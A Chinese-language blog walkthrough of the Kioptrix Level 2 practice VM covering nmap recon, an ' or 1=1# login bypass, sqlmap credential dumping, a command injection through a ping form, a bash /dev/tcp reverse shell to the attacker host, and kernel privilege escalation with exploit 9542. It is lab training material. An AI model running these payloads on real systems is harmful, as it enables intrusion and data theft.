程序员经验分享-hwhale

Kioptrix: Level 2靶机实战 sql注入万能密码到后台 命令执行;getshell 内核漏洞9542 提权

2023-11-08

前言

Kioptrix: Level 2 (#1): 靶机地址

https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

下载解压好后 将 网络修改为 nat模式

0x01 信息收集

1.1 探测靶机ip

netdiscover -i eth0 -r 192.168.157.0/24

在这里插入图片描述

1.2 nmap探测端口

nmap -A -T4 -v 192.168.157.155 -o port.txt

cat port.txt

# Nmap 7.91 scan initiated Tue Nov 16 13:57:27 2021 as: nmap -A -T4 -v -o port.txt 192.168.157.155
Nmap scan report for 192.168.157.155
Host is up (0.00057s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey: 
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http       Apache httpd 2.0.52 ((CentOS))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind    2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            632/udp   status
|_  100024  1            635/tcp   status
443/tcp  open  ssl/https?
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: md5WithRSAEncryption
| Not valid before: 2009-10-08T00:10:47
| Not valid after:  2010-10-08T00:10:47
| MD5:   01de 29f9 fbfb 2eb2 beaf e624 3157 090f
|_SHA-1: 560c 9196 6506 fb0f fb81 66b1 ded3 ac11 2ed4 808a
|_ssl-date: 2021-11-16T03:48:01+00:00; -2h09m37s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|_    SSL2_DES_64_CBC_WITH_MD5
631/tcp  open  ipp        CUPS 1.1
| http-methods: 
|   Supported Methods: GET HEAD OPTIONS POST PUT
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open  mysql      MySQL (unauthorized)
MAC Address: 00:0C:29:B8:9C:B4 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Uptime guess: 0.011 days (since Tue Nov 16 13:41:59 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=204 (Good luck!)
IP ID Sequence Generation: All zeros

Host script results:
|_clock-skew: -2h09m37s

TRACEROUTE
HOP RTT     ADDRESS
1   0.57 ms 192.168.157.155

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Nov 16 13:57:38 2021 -- 1 IP address (1 host up) scanned in 11.25 seconds

整理 发现 开放的端口有

22 SSH 80 HTTP 111 rpcbind 443 SSL HTTPS 631 ipp 3306 mysql

0x02 漏洞探测

2.1 访问首页 80端口

访问 http://192.168.157.155

发现是一个

2.1.1远程系统管理员登录界面

在这里插入图片描述

看到登录界面 就想到 爆破 sql注入 万能密码 目录扫描

2.1.1.1 尝试万能密码

’ or 1=1#

在这里插入图片描述
进入后台
在这里插入图片描述

2.1.1.2 sqlmap
sqlmap -r sql.txt  --level 5 --risk 3
sqlmap -r sql.txt  --level 5 --risk 3 --dbs
sqlmap -r sql.txt  --level 5 --risk 3 -D webapp --tables
sqlmap -r sql.txt  --level 5 --risk 3 -D webapp -T users --columns 
sqlmap -r sql.txt  --level 5 --risk 3 -D webapp -T users -C username,password --dump

在这里插入图片描述

admin    5afac8d85f 
john      66lajGGbla

登录成功
在这里插入图片描述

2.1.2 命令执行漏洞利用

登录进后台后发现是一处 可以执行ping命令的 功能点

测试是否存在 传参过滤不严情况

192.168.157.137;ifconfig

在这里插入图片描述
发现 两个命令都执行成功

kali 开启监听

nc -lvvp 9897

尝试反弹shlel

192.168.157.137&&bash -i >& /dev/tcp/192.168.157.137/9897 0>&1

在这里插入图片描述
页面一直加载不出
但是反弹shell成功
在这里插入图片描述

0x03提权

3.1查看当前权限

id

在这里插入图片描述
仅为 apache服务器权限

3.2内核漏洞提权

3.2.1 查看操作系统版本和内核版本

uname -a
cat /etc/redhat-release
lsb_release -a

系统为centos 4.5 内核版本为2.6.9
在这里插入图片描述

3.2.2 找版本漏洞

searchsploit centos 4.5

在这里插入图片描述

将exp 拷贝到当前目录

searchsploit -m 9542

在这里插入图片描述

3.2.3上传到靶机中

  • kali 在当前目录起一个pthon服务

    pyhton3 -m http.server 80

  • 去获取到的shell中下载

    • 注意目录权限问题 需要在tmp目录
      在这里插入图片描述

3.2.4 编译运行

gcc -o 9542 9542.c
./9542

提权成功
在这里插入图片描述

0x04 总结

该靶机 利用的 登录框处的 sql注入 和 后台的 命令执行漏洞,获取到网站用户的shell。
之后使用centos4.5的系统漏洞进行提权,较为简单。

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

靶机学习

安全

apache

web安全

Kioptrix: Level 2靶机实战 sql注入万能密码到后台 命令执行;getshell 内核漏洞9542 提权 的相关文章

随机推荐

  • DOCKER安装SEATA注册到NACOS

    因为总是多多少少的会出现问题 所以我自行搭建成功 跳过所有坑之后写了个博客 此处没有使用集群 说明 请创建对应seata所需的数据库 将seata源码中的sql执行进去 1 使用最新的seata和nacos以及mysql5 7版本 基于ce

  • 【react】props总结

    每个组件对象都会有props属性 组件标签内的所有属性都保存在props中 props是通过标签属性从组件外向组件内传递变化的数据 注意 组件内部不用修改props数据 props是只读的

  • 「QT踩坑」中断业务逻辑为死循环的线程

    文章目录 I Motivation II Solution III Evaluation I Motivation 在分布式计算模型中 常常会遇到线程间通信 同 异步 的问题 比如 Master 分配任务给 Worker 后者在完成任务之后

  • HTML图片热区map area的用法

    HTML图片热区map area的用法 area 标记主要用于图像地图 通过该标记可以在图像地图中设定作用区域 又称为热点 这样当用户的鼠标移到指定的作用区域点击时 会自动链接到预先设定好的页面 其基本语法结构如下 1 area

  • vue+openlayer实现:拖拽、旋转、缩放、拉伸、移动等功能以及对应的监听事件

    前言 openlayer 是有他自己的扩展插件 ol ext 我们这里用他来实现图形的操作 拖拽 旋转 缩放 拉伸 移动等等功能 以及他的监听事件 毕竟我们作图以后是需要保存数据给后端 存到数据库的 相关资料 1 ol ext官方地址 入口

  • 坐标变换

    根据线性代数32页 编写的 任意1点坐标绕某一点坐标逆时针旋转degree度 可用公式 x x1 cos degree y1 sin degree y x1 sin degree y1 sin degree 很方便 include

  • 解决ChatGLM-6B的微调算法P-tuning v2运行train.sh出错

    运行清华大学开源的ChatGLM 6B及其微调算法P tuning v2 根据其官方提供的步骤 在配置好环境后Run gt gt bash train sh gt gt 报错如下 Traceback most recent call las

  • c++中的堆和栈

    在 C 中 内存的使用主要分为两种类型 栈内存和堆内存 栈 Stack 内存 栈内存用于存储局部变量和函数参数 函数内部创建的变量通常都在栈上 例如 如果你在函数中声明一个整数或一个对象 那么这个整数或对象将在栈上创建 栈上的内存由编译器自

  • 系统默认编码的配置(转)

    运行locale指令得到当前系统编码设置的详细资料 一 locale的五脏六腑 1 语言符号及其分类 LC CTYPE 2 数字 LC NUMERIC 3 比较和排序习惯 LC COLLATE 4 时间显示格式 LC TIME 5 货币单位

  • java开发用amd处理器,为什么我的Java应用程序在AMD处理器上速度更快?

    I made the observation that my java application is running much faster when executed on an AMD processor in contrast to

  • java学习之_Spring框架01_IoC控制反转和DI依赖注入

    spring架构 Spring 最初的目标就是要整合一切优秀资源 然后对外提供一个统一的服务 Spring 模块构建在核心容器之上 核心容器定义了创建 配置和管理 bean 的方式 bean可以看成是一个黑盒子 即只需要知道其功能而不必知道

  • CustomEditor CustomPropertyDrawer

    CustomEditor typeof Type 这是所有写过编辑器的人非常熟悉的一行代码 因为它是编辑器的入口 但是 CustomPropertyDrawer typeof Type 恐怕就没几个人知道了 它和CustomEditor功能

  • 如何分析FPGA的片上资源使用情况

    如何分析FPGA的片上资源使用情况 在维护遗留代码 4 时序问题初露端倪这篇文章中 我提到 第三方开发的设计中 组合逻辑与时序逻辑的比例为2 6 1 这是造成该设计时序收敛困难的原因之一 mengyudn朋友很热心 对这个数据的来历产生了疑

  • 神经网络笔记

    神经网络 一 什么是神经网络 是基于生物学中神经网络的基本原理 在理解和抽象了人脑结构和外界刺激响应机制后 以网络拓扑知识为理论基础 模拟人脑的神经系统对复杂信息的处理机制的一种数学模型 二 神经网络的基本特性 1 非线性 非线性关系是自然

  • jsp自定义标签库

    标签的概念 标签 标签是一种XML元素 通过标签可以使JSP网页变得简洁并且易于维护 还可以方便地实现同一个JSP文件支持多种语言版本 由于标签是XML元素 所以它的名称和属性都是大小写敏感的 标签处理类 标签处理类似是Java类 这个类继

  • 绘图工具(代码实现绘图)---plantuml

    基础入门第一个例子 时序图 流程图 源代码 图片展示 还有很多这里不再介绍 最近看到asciidoc和plantuml 是编写文档的极好工具 相对word和visio 最大的好处是可以实现代码版本管理 作为changelist asciid

  • eclipse运行,提示错误:The selection cannot be launched,and there are no recent launch

    错误原因 1 代码编辑错误 重点检查 main的拼写 String args 的拼写 类名后有没有空格 的书写等 2 没有定义类 需要先添加类 在文件中书写 如下 先新建Hello world类 再在生成的文件中书写代码 运行 就能得到正确

  • 没有与参数列表匹配的构造函数_C++构造函数和初始化表

    构造函数和初始化表 1 构造函数 当类对象被创建时 编译系统对象分配内存空间 并自动调用该构造函数 由构造函数完成成员的初始化工作 因此构造函数的作用是初始化对象的数据成员 2 构造函数可以重载 构造函数通过参数表的差别化可以形成重载 创建

  • 移动开发学习第二课学习记录

    图片资源 图片资源有 png jpg gif 9 png等文件 图片资源分类 应用图标资源村房子啊mipmap文件中 界面中使用的图片资源 存放在drawable文件夹中 一般不采用花哨的配色 除了个别的活动主题外 一般以浅色暖色为主 调用

  • Kioptrix: Level 2靶机实战 sql注入万能密码到后台 命令执行;getshell 内核漏洞9542 提权

    Kioptrix Level 1靶机实战 前言 0x01 信息收集 1 1 探测靶机ip 1 2 nmap探测端口 0x02 漏洞探测 2 1 访问首页 80端口 2 1 1远程系统管理员登录界面 2 1 1 1 尝试万能密码 2 1 1

热门标签